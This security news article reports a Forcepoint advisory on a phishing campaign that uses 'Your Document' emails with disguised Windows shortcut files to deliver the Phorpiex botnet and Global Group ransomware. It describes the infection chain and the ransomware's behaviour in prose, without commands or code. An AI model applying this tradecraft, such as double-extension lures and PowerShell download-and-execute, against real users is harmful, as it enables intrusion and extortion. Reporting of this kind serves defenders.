A high-volume phishing campaign delivering the long-running Phorpiex malware has been observed using emails with the subject line “Your Document,” a lure widely seen throughout 2024 and 2025.
The messages include an attachment that appears to be a harmless document but is actually a weaponised Windows Shortcut file designed to initiate a multi-stage infection chain.
According to a new advisory by Forcepoint, the campaign relies on the continued effectiveness of Windows shortcut (.lnk) files as an initial access vector and their role in delivering Global Group ransomware, a stealthy, offline-capable ransomware-as-a-service (RaaS) operation.
Why Windows Shortcut Lures Persist
Windows shortcut files remain a reliable way to convert a single click into code execution. Attackers disguise the files using double extensions such as Document.doc.lnk and take advantage of Windows default settings that hide known file extensions.
Visual cues also play a role, with icons copied from legitimate Windows resources to reinforce the illusion of a trusted document.
Once opened, the shortcut launches cmd.exe, which in turn runs PowerShell to download and execute a second-stage payload. No installer is displayed and no obvious warning is shown to the user, allowing the process to run quietly in the background.
The infection chain unfolds in a straightforward but effective sequence:
-
A phishing email presents a document-looking attachment
-
The shortcut executes embedded commands via cmd.exe
-
PowerShell downloads a remote payload and saves it as windrv.exe
-
The binary is executed locally without visible user prompts
The payload retrieved in this campaign is associated with Phorpiex, a modular malware-as-a-service (MaaS) botnet active since around 2010 and commonly used to distribute ransomware and other secondary malware.
Global Group’s Offline Ransomware Model
In this case, Phorpiex ultimately deployed Global Group ransomware, which differs from many modern families by operating entirely offline.
The malware generated encryption keys locally, did not contact a command-and-control (C2) server and performed no data exfiltration.
This design allowed it to function in isolated or air-gapped environments and reduced reliance on network traffic that might otherwise trigger alerts.
The ransomware encrypted files using the ChaCha20-Poly1305 algorithm and appended the .Reco extension. A ransom note titled README.Reco.txt was dropped across the system, while the desktop wallpaper was replaced with a GLOBAL GROUP message.
The malware also deleted itself after execution and removed shadow copies, complicating forensic analysis and recovery.
“This campaign demonstrates how long-standing malware families like Phorpiex remain highly effective when paired with simple but reliable phishing techniques,” Forcepoint said.
“By exploiting familiar file types such as Windows shortcut files, attackers can gain initial access with minimal friction, enabling a smooth transition to high-impact payloads like Global Group ransomware.”
